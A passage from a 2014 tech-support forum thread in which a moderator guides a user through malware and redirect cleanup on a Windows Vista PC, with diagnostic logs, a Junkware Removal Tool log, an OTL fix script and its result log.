 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{106BC7FE-8355-457C-BFA8-F1074063E433}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{48958506-A8CD-48C1-8F62-70C58A765893}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{55D2CB44-E5EA-489D-B414-9FF869D82F14}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{76E29047-A11F-4C9B-BC08-E0AFE11B5A9C}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{91957554-9ECD-4B6D-AA0B-9C79FEDDE178}" = lport=rpc | protocol=6 | dir=in | app=c:\program files\sisoftware\sisoftware sandra lite 2011\wnt500x86\rpcsandrasrv.exe |
"{9EDE1089-0741-41CF-9CF9-C053C060AFC5}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{AA18607F-388B-49CE-8246-4D0AB9310B4D}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{B60D5705-E5D4-441D-8DF6-5E1167E3C56B}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{B7653951-C57B-4B2C-AA5E-B01E34481C5B}" = lport=rpc | protocol=6 | dir=in | app=c:\program files\sisoftware\sisoftware sandra lite 2011\rpcagentsrv.exe |
"{BCD97FA1-4FE7-47EC-82C2-F82A2F1A246E}" = lport=6004 | protocol=17 | dir=in | app=c:\program files\microsoft office\office14\outlook.exe |
"{CC3D8D74-667A-4B23-87C5-BD9EE183AE6C}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{CC6E4E85-CFF3-4E7F-99B9-F9EFCE589C29}" = lport=10243 | protocol=6 | dir=in | app=system |
"{D07CE674-A1B4-4501-8089-186E8CE65FFE}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{D6369010-73BB-4A38-B45A-C29FF3ECC8DC}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{DB763260-73EC-469B-B9B3-327F0F67553B}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{E3D0F135-A936-4483-9F26-02B050170269}" = rport=10243 | protocol=6 | dir=out | app=system |
"{EACF02C1-1FA6-48FC-B3D0-75DFC9490B03}" = lport=2869 | protocol=6 | dir=in | app=system |
"{EBEBF4B8-1FE1-40F7-9BF3-B80314B24516}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{F27555A7-D46A-4A65-AE55-0C0D02535108}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{F35C4CAC-A04A-418B-9A49-F1888C428E01}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0FB7A62C-5ED9-459F-AB82-53E03E461B80}" = protocol=1 | dir=in | name=sisoftware deployment agent service (icmp-in) |
"{11331B79-19CC-498C-8F37-8E8ABE03B386}" = protocol=6 | dir=in | app=c:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe |
"{1AE7FCD7-AC27-4279-AC61-42957246D6C8}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe |
"{362ED1A3-095C-4AA5-9599-BD008DCA7AFC}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{3D2E9305-ECB4-4CB3-96FB-533D0AD0BECB}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version7\teamviewer.exe |
"{3E721B21-B723-4D8E-8AA6-ABF924AC8D7E}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{416B879A-AE10-4241-814C-9D51DE9B9F21}" = protocol=6 | dir=in | app=c:\program files\samsung\samsung new pc studio\npsvsvr.exe |
"{53EB3A80-B586-42F9-820C-162A7036F0D7}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{55454CB3-B412-43EC-9072-6D34F34E91DF}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{5E4CF4F5-FD3E-47BC-9915-06599F4BDC0A}" = protocol=6 | dir=in | app=c:\program files\samsung\samsung new pc studio\npsasvr.exe |
"{63BDA66F-38D8-4C41-916B-F731F0A665AC}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office14\onenote.exe |
"{6560E52C-B2ED-4B25-A27C-D35A419D9E61}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{7B480FB5-7C1F-4BBB-B59A-1603A491FAE2}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe |
"{7D365033-B573-4772-878E-F3AE43A122E8}" = protocol=6 | dir=in | app=c:\program files\yahoo!\messenger\yahoomessenger.exe |
"{7F09CB32-E3DC-464D-AE2E-C41052C2A191}" = protocol=6 | dir=out | app=system |
"{82714B84-CB07-4A33-8DAB-44109F2C38E2}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{83FC0D0F-FB88-4015-8207-004D8A572678}" = protocol=17 | dir=in | app=c:\program files\yahoo!\messenger\yahoomessenger.exe |
"{8953BE9D-7772-4E2B-B748-C0CF748F77D3}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version7\teamviewer.exe |
"{8D16E20D-3E66-48AA-9E43-34F24A012ADC}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office14\groove.exe |
"{8E3691E1-B7E3-4997-B4B1-064A5CA91085}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{911C6DD1-2C49-49FC-B22D-BC6A59F27E6C}" = protocol=6 | dir=in | app=c:\program files\acer arcade live\acer homemedia connect\kernel\dms\clmsserver.exe |
"{919B4384-9CC5-4257-A6FD-DC37B7FEAB98}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office14\groove.exe |
"{9342665A-E4CC-4DBA-B873-E2A46738B367}" = protocol=17 | dir=in | app=c:\program files\samsung\samsung new pc studio\npsasvr.exe |
"{99FA0787-D4E2-4033-BF6E-C5E90F3E1437}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe |
"{9BECEB03-064B-4419-B5D7-9E2BA8C65823}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version7\teamviewer_service.exe |
"{A218189A-937F-46D6-96C6-732B1B236605}" = protocol=17 | dir=in | app=c:\program files\acer arcade live\acer homemedia connect\kernel\dms\clmsserver.exe |
"{A8E4D800-E9E5-4493-B58C-E9FBF3CBFEC1}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe |
"{AA7CE929-878F-492E-B8B1-CDB2569B626B}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{B61AC4FB-67E7-483F-AE62-136CC9B587AD}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{BA314D66-723B-46A5-AA8A-5B5832314145}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{BCDA565E-DEEB-4121-BF50-880D9C95FA8C}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version7\teamviewer_service.exe |
"{C54FF50D-CD65-4B5A-A5DE-85AB1B4E0B8A}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{C65B677A-11E8-4344-9C96-51199BDF88AA}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe |
"{D0B84D61-009E-49B9-85A1-76A9E666FDFE}" = protocol=17 | dir=in | app=c:\program files\samsung\samsung new pc studio\npsvsvr.exe |
"{D4ED61CF-112E-40A7-BDB6-F7A4E45BC418}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office14\onenote.exe |
"{DB7012B0-3D6C-4142-8918-456231EA418A}" = protocol=17 | dir=in | app=c:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe |
"{DCE2718A-F223-47B2-A02C-8F7DCF77D2DC}" = protocol=1 | dir=in | name=sisoftware sandra agent service (icmp-in) |
"{EBFAE151-F926-441F-82FC-67BFEA8A4F09}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"TCP Query User{1657F1AF-DD92-42D0-BD6C-7DA40FA59210}C:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=6 | dir=in | app=c:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe |
"TCP Query User{34C7ADAD-E07A-4497-B171-235D12964546}C:\program files\motorola\rsd lite\sdl.exe" = protocol=6 | dir=in | app=c:\program files\motorola\rsd lite\sdl.exe |
"TCP Query User{9D9EBD86-A35C-49FA-A3B0-47873F2AEDD9}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" = protocol=6 | dir=in | app=c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe |
"TCP Query User{B21FF375-76DA-4B6A-9368-D305E81B8ECB}C:\program files\winamp\winamp.exe" = protocol=6 | dir=in | app=c:\program files\winamp\winamp.exe |
"TCP Query User{EAED830C-A35D-43EE-AB14-13EB1FAF796A}C:\program files\winamp\winamp.exe" = protocol=6 | dir=in | app=c:\program files\winamp\winamp.exe |
"UDP Query User{0410944C-A150-4C5D-9A6C-5567A9D1C4BC}C:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=17 | dir=in | app=c:\users\ken\appdata\roaming\dropbox\bin\dropbox.exe |
"UDP Query User{10524813-1FFF-479A-B542-D516F9D99FDB}C:\program files\winamp\winamp.exe" = protocol=17 | dir=in | app=c:\program files\winamp\winamp.exe |
"UDP Query User{261929B5-2AA6-4E76-B732-33E160B58C71}C:\program files\winamp\winamp.exe" = protocol=17 | dir=in | app=c:\program files\winamp\winamp.exe |
"UDP Query User{3042571E-D61B-4E94-A4C7-B5DC5C28F397}C:\program files\motorola\rsd lite\sdl.exe" = protocol=17 | dir=in | app=c:\program files\motorola\rsd lite\sdl.exe |
"UDP Query User{92FFD427-CB41-4630-A841-A4ED4E26E972}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" = protocol=17 | dir=in | app=c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}" = Windows Live ID Sign-in Assistant
"{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer
"{196467F1-C11F-4F76-858B-5812ADC83B94}" = MSXML 4.0 SP3 Parser
"{2227E1FA-01F5-483C-AB0E-2A308E900B3D}" = InterVideo FilterSDK for Hauppauge
"{2300EE96-0A41-4FAB-BD03-989EC44577A0}" = Acronis Disk Director Suite
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer
"{26A24AE4-039D-4CA4-87B4-2F83217055FF}" = Java 7 Update 55
"{28DB8373-C1BB-444F-A427-A55585A12ED7}" = Motorola Device Manager
"{36A345C9-0691-45A1-AEEF-29ECEC8B5014}" = Microsoft Security Client
"{3D3E663D-4E7E-4577-A560-7ECDDD45548A}" = PVSonyDll
"{4903D172-DCCB-392F-93A3-34CA9D47FE3D}" = Microsoft .NET Framework 4.5.1
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{5A0C892E-FD1C-4203-941E-0956AED20A6A}" = APC PowerChute Personal Edition
"{5B24ECDD-968F-4DF2-91E5-E4BFC7B72134}" = RSDLite
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{65DA2EC9-0642-47E9-AAE2-B5267AA14D75}" = Activation Assistant for the 2007 Microsoft Office suites
"{67ADE9AF-5CD9-4089-8825-55DE4B366799}" = NTI Backup NOW! 4.7
"{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}" = Windows Media Player Firefox Plugin
"{6C9FA746-8759-4040-A436-42922CB3492E}" = VistaBootPRO 3.3
"{6D52C408-B09A-4520-9B18-475B81D393F1}" = Microsoft Works
"{6ED53E0C-EAC0-4F0F-947D-6BA817E4C8C3}" = HostsMan 3.1.57
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}" = Acer ScreenSaver
"{7B63B2922B174135AFC0E1377DD81EC2}" =
"{81DE15C9-5390-4533-81DF-2DC936C1A40C}" = Motorola Device Software Update
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}" = NVIDIA PhysX
"{90140000-0011-0000-0000-0000000FF1CE}" = Microsoft Office Professional Plus 2010
"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010
"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010
"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010
"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010
"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010
"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010
"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010
"{90140000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2010
"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010
"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010
"{90140000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2010
"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010
"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{933B4015-4618-4716-A828-5289FC03165F}" = VC80CRTRedist - 8.0.50727.6195
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AAF4238F-7C29-451D-9925-C753271A5728}" = Microsoft Visual C++ Run Time  Lib Setup
"{AC76BA86-7AD7-1033-7B44-A81300000003}" = Adobe Reader 8.1.5
"{AC76BA86-7AD7-1033-7B44-A81300000003}_814" = KB408682
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{B0255743-165B-4BD5-8DA8-37DFB9930012}" = Norton Ghost
"{B13A7C41581B411290FBC0395694E2A9}" = DivX Converter
"{B2544A03-10D0-4E5E-BA69-0362FFC20D18}" = OGA Notifier 2.0.0048.0
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision" = NVIDIA 3D Vision Driver 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB" = NVIDIA 3D Vision Controller Driver 310.70
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.12.1031
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update" = NVIDIA Update 1.11.3
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1" = Spybot - Search & Destroy
"{C3113E55-7BCB-4de3-8EBF-60E6CE6B2296}_is1" = SiSoftware Sandra Lite 2011
"{C5D706E3-BF18-4106-B02E-F55A7F22DDEE}" = TEW-805UB AC1200 Dual Band USB Adapter
"{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}" = SUPERAntiSpyware
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{CE386A4E-D0DA-4208-8235-BCE43275C694}" = LightScribe  1.4.142.1
"{D76D1828-BBA0-4BD9-8181-5ACC617DC5F2}" = Virtual Earth 3D (Beta)
"{DBA4DB9D-EE51-4944-A419-98AB1F1249C8}" = LiveUpdate Notice (Symantec Corporation)
"{E80F62FF-5D3C-4A19-8409-9721F2928206}" = LiveUpdate (Symantec Corporation)
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F35D5A5E-7739-49DB-8A0E-23E2E8F99D1A}" = Motorola Mobile Drivers Installation 5.9.0
"{F5266D28-E0B2-4130-BFC5-EE155AD514DC}" = Apple Application Support
"7-Zip" = 7-Zip 9.20
"Activation Assistant for the 2007 Microsoft Office suites" = Activation Assistant for the 2007 Microsoft Office suites
"Adobe Flash Player ActiveX" = Adobe Flash Player 13 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 13 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"ALchemy" = Creative ALchemy
"Android SDK Tools" = Android SDK Tools
"AudioCS" = Creative Audio Console
"CCleaner" = CCleaner
"Creative Software AutoUpdate" = Creative Software AutoUpdate
"DAEMON Tools Lite" = DAEMON Tools Lite
"DivX Setup" = DivX Setup
"ERUNT_is1" = ERUNT 1.1j
"getPlus®_ocx" = getPlus®_ocx
"Google Chrome" = Google Chrome
"Google Updater" = Google Updater
"ImgBurn" = ImgBurn
"InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.75.0.1300
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft Security Client" = Microsoft Security Essentials
"Mozilla Firefox 4.0 (x86 en-US)" = Mozilla Firefox 4.0 (x86 en-US)
"nanoPEG-Editor 2.6.0 for WinTV_is1" = nanoPEG-Editor 2.6.0 for WinTV
"NST" = Norton Safe Web Lite
"NVIDIA Display Control Panel" = NVIDIA Display Control Panel
"NVIDIA StereoUSB Driver" = NVIDIA 3D Vision Controller Driver
"NVIDIAStereo" = NVIDIA Stereoscopic 3D Driver
"Office14.PROPLUS" = Microsoft Office Professional Plus 2010
"OpenAL" = OpenAL
"OpenDNS Updater" = OpenDNS Updater 2.2.1
"PdaNet_is1" = PdaNet for Android 3.00
"PsuedoLiveUpdate" = LiveUpdate (Symantec Corporation)
"Revo Uninstaller" = Revo Uninstaller 1.95
"SAMSUNG Mobile Composite Device" = SAMSUNG Mobile Composite Device Software
"SAMSUNG Mobile Modem" = SAMSUNG Mobile Modem Driver Set
"Samsung Mobile phone USB driver" = Samsung Mobile phone USB driver Software
"SAMSUNG Mobile USB Modem" = SAMSUNG Mobile USB Modem Software
"SAMSUNG Mobile USB Modem 1.0" = SAMSUNG Mobile USB Modem 1.0 Software
"SpywareBlaster_is1" = SpywareBlaster 4.5
"TeamViewer 8" = TeamViewer 8
"Winamp" = Winamp
"Yahoo! Messenger" = Yahoo! Messenger
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Dropbox" = Dropbox
"Winamp Detect" = Winamp Detector Plug-in
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 5/20/2014 2:10:41 PM | Computer Name = Ken-Home | Source = System Restore | ID = 8193
Description =
 
 
< End of report >
 


  • 0

#5
Valinorum
Posted 20 May 2014 - 07:45 PM

Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
You missed step 2. :)
  • 0

#6
Kenjesse
Posted 20 May 2014 - 09:01 PM

Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

opps...sorry did step 2 just missed posting the log:

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.4 (04.06.2014:1)
OS: Windows Vista ™ Home Premium x86
Ran by Ken on Tue 05/20/2014 at 14:02:32.88
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values

Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\DisplayName
Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\URL



~~~ Registry Keys



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Users\Ken\appdata\locallow\boost_interprocess"
Successfully deleted: [Folder] "C:\Users\Ken\Local Settings\Application Data\cre"



~~~ FireFox

Successfully deleted the following from C:\Users\Ken\AppData\Roaming\mozilla\firefox\profiles\8agrx3pn.default\prefs.js

user_pref("google.toolbar.button_option.cached.gtbSearchBlogs", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchBlogs\" t
user_pref("google.toolbar.button_option.cached.gtbSearchPhotos", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchPhotos\"
user_pref("google.toolbar.button_option.cached.gtbSearchScholar", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchScholar
user_pref("google.toolbar.button_option.cached.gtbstoolbar-google-com_CTK0Y7F4MTG6NKYH03WT-xml", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.o
user_pref("google.toolbar.button_option.cached.gtbstoolbar-google-com_J66T77NJDBMW4FEUU7FA-xml", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.o
user_pref("google.toolbar.search-icon", "data:image/x-icon;base64,AAABAAIAEBAAAAEAIABoBAAAJgAAACAgAAABACAAqBAAAI4EAAAoAAAAEAAAACAAAAABACAAAAAAAAAEAAASCwAAEgsAAAAAAAAAAAAA9IVCS
Emptied folder: C:\Users\Ken\AppData\Roaming\mozilla\firefox\profiles\8agrx3pn.default\minidumps [13 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 05/20/2014 at 14:07:38.97
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 


  • 0

#7
Valinorum
Posted 20 May 2014 - 09:35 PM

Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
Hi Kenjesse, :)

Uninstall the followong out-dated programs and install their updated version.
  • Adobe Reader 8.1.5 (Download latest version from here. Uncheck the optional offer.)
  • Malwarebytes Anti-Malware version 1.75.0.1300 ( I will instruct you to install the latest version later.)
  • Mozilla Firefox 4.0 (x86 en-US) (Latest version available here
  • TeamViewer 8 (Latest version available here.
Uninstall the following security programs which may cause problem with our fixes. You may install them again if you wish after I declare you clean.
  • Spybot - Search & Destroy
  • SUPERAntiSpyware
  • SpywareBlaster 4.5
 
  • Step #4 Fix with OTL
    • Re-run OTL by right clicking and choosing Run as administrator;
    • Under the Custom Scans/Fixes Box copy and paste the following contents inside the quote box. (Do not include the word 'quote').

      :Commands
      [createrestorepoint]

      :OTL
      O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
      O2 - BHO: (no name) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - No CLSID value found.
      O4 - HKCU..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
      O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (SUPERAntiSpyware)
      O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
      O13 - gopher Prefix: missing
      O16 - DPF: {44990B00-3C9D-426D-81DF-AAB636FA4345} https://www-secure.s...abs/tgctlcm.cab (Reg Error: Key error.)
      O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...r/ultrashim.cab (Reg Error: Key error.)
      O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell - "" = AutoRun
      O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell\AutoRun\command - "" = M:\LaunchU3.exe -a
      O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell - "" = AutoRun
      O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell\AutoRun\command - "" = J:\CTRun\Start.EXE
      O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell - "" = AutoRun
      O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell\AutoRun\command - "" = K:\LaunchU3.exe -a
      [3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
      [3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
      @Alternate Data Stream - 104 bytes -> C:\ProgramData\TEMP:5C321E34

      :Reg
      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
      "{7B63B2922B174135AFC0E1377DD81EC2}"=-

      :Commands
      [emptytemp]
      [resethosts]

    • Click on "Run Fix" and let the program run unhindered;
    • Your PC will reboot automatically and a log will be opened;
    • Please post it in your next reply.
 

How is your system running?

 
  • Required Log(s):
    • OTL Fix Log
Regards,
Valinorum
  • 0

#8
Kenjesse
Posted 21 May 2014 - 08:22 AM

Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Programs updated or removed as requested, OTL fix complete, log follows.  Am manually going to run ERUNT and reboot again for now but have not experienced any further redirects.  Will followup with more as to how system is running.

 

All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== OTL ==========
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53707962-6F74-2D53-2644-206D7942484F}\ not found.
C:\Program Files\Spybot - Search & Destroy\SDHelper.dll moved successfully.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{83A2F9B1-01A2-4AA5-87D1-45B6B8505E96}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83A2F9B1-01A2-4AA5-87D1-45B6B8505E96}\ not found.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\SpybotSD TeaTimer not found.
File C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe not found.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\SUPERAntiSpyware not found.
File C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{DFB852A3-47F8-48C4-A200-58CAB36FD2A2}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFB852A3-47F8-48C4-A200-58CAB36FD2A2}\ not found.
File C:\Program Files\Spybot - Search & Destroy\SDHelper.dll not found.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\gopher|:gopher:// /E : value set successfully!
Starting removal of ActiveX control {44990B00-3C9D-426D-81DF-AAB636FA4345}
C:\Windows\Downloaded Program Files\tgctlcm.inf moved successfully.
